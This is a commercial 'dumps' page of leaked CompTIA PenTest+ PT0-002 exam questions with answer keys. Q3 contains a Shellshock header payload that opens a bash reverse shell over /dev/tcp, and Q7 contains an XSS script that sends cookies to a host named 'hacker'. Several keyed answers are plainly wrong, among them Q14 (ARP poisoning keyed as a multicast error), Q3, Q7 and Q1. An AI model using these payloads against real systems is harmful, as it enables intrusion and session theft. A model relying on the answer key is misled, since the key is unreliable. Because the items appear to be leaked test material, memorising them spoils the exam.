PT0-002 | 100% Guarantee CompTIA PT0-002 Testing Software Online

Proper study guides for Up to date CompTIA CompTIA PenTest+ Certification Exam certified begins with CompTIA PT0-002 preparation products which designed to deliver the Virtual PT0-002 questions by making you pass the PT0-002 test at your first time. Try the free PT0-002 demo right now.

CompTIA PT0-002 Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. PsExec

Answer: D

NEW QUESTION 2
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. A signed statement of work
  • B. The correct user accounts and associated passwords
  • C. The expected time frame of the assessment
  • D. The proper emergency contacts for the client

Answer: B

NEW QUESTION 3
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Answer: D

NEW QUESTION 4
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the –o, -p22, and –sC options set against the target
  • B. Run nmap with the –sV and –p22 options set against the target
  • C. Run nmap with the --script vulners option set against the target
  • D. Run nmap with the –sA option set against the target

Answer: B

NEW QUESTION 5
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. will reveal vulnerabilities in the Modbus protocol.
  • B. may cause unintended failures in control systems.
  • C. may reduce the true positive rate of findings.
  • D. will create a denial-of-service condition on the IP networks.

Answer: B

NEW QUESTION 6
Which of the following are the MOST important items to include in the final report for a penetration test?
(Choose two.)

  • A. The CVSS score of the finding
  • B. The network location of the vulnerable device
  • C. The vulnerability identifier
  • D. The client acceptance form
  • E. The name of the person who found the flaw
  • F. The tool used to find the issue

Answer: CF

NEW QUESTION 7
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Web-application firewall
  • B. Parameterized queries
  • C. Output encoding
  • D. Session tokens
  • E. Input validation
  • F. Base64 encoding

Answer: BE

NEW QUESTION 8
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The libraries may be vulnerable
  • B. The licensing of software is ambiguous
  • C. The libraries’ code bases could be read by anyone
  • D. The provenance of code is unknown
  • E. The libraries may be unsupported
  • F. The libraries may break the application

Answer: AC

NEW QUESTION 9
A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

  • A. Root user
  • B. Local administrator
  • C. Service
  • D. Network administrator

Answer: C

NEW QUESTION 10
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  • A. Whether the cloud service provider allows the penetration tester to test the environment
  • B. Whether the specific cloud services are being used by the application
  • C. The geographical location where the cloud services are running
  • D. Whether the country where the cloud service is based has any impeding laws

Answer: A

NEW QUESTION 11
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
PT0-002 dumps exhibit Have a full TCP connection
PT0-002 dumps exhibit Send a “hello” payload
PT0-002 dumps exhibit Walt for a response
PT0-002 dumps exhibit Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Run nmap –Pn –sV –script vuln <IP address>.
  • B. Employ an OpenVAS simple scan against the TCP port of the host.
  • C. Create a script in the Lua language and use it with NSE.
  • D. Perform a credentialed scan with Nessus.

Answer: C

NEW QUESTION 12
You are a penetration tester running port scans on a server. INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit
PT0-002 dumps exhibit


Solution:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 13
A compliance-based penetration test is primarily concerned with:

  • A. obtaining Pll from the protected network.
  • B. bypassing protection on edge devices.
  • C. determining the efficacy of a specific set of security standards.
  • D. obtaining specific information from the protected network.

Answer: C

NEW QUESTION 14
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?

  • A. A device on the network has an IP address in the wrong subnet.
  • B. A multicast session was initiated using the wrong multicast group.
  • C. An ARP flooding attack is using the broadcast address to perform DDoS.
  • D. A device on the network has poisoned the ARP cache.

Answer: B

NEW QUESTION 15
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
PT0-002 dumps exhibit
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Edit the discovered file with one line of code for remote callback
  • B. Download .pl files and look for usernames and passwords
  • C. Edit the smb.conf file and upload it to the server
  • D. Download the smb.conf file and look at configurations

Answer: C

NEW QUESTION 16
A penetration tester wrote the following script to be used in one engagement:
PT0-002 dumps exhibit
Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Attempt to flood open ports.
  • D. Create an encrypted tunnel.

Answer: A

NEW QUESTION 17
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.
Which of the following should be included as a recommendation in the remediation report?

  • A. Stronger algorithmic requirements
  • B. Access controls on the server
  • C. Encryption on the user passwords
  • D. A patch management program

Answer: C

NEW QUESTION 18
A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  • A. Badge cloning
  • B. Dumpster diving
  • C. Tailgating
  • D. Shoulder surfing

Answer: B

NEW QUESTION 19
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

  • A. Perform XSS.
  • B. Conduct a watering-hole attack.
  • C. Use BeEF.
  • D. Use browser autopwn.

Answer: A

NEW QUESTION 20
......

P.S. Easily pass PT0-002 Exam with 110 Q&As Dumps-hub.com Dumps & pdf Version, Welcome to Download the Newest Dumps-hub.com PT0-002 Dumps: https://www.dumps-hub.com/PT0-002-dumps.html (110 New Questions)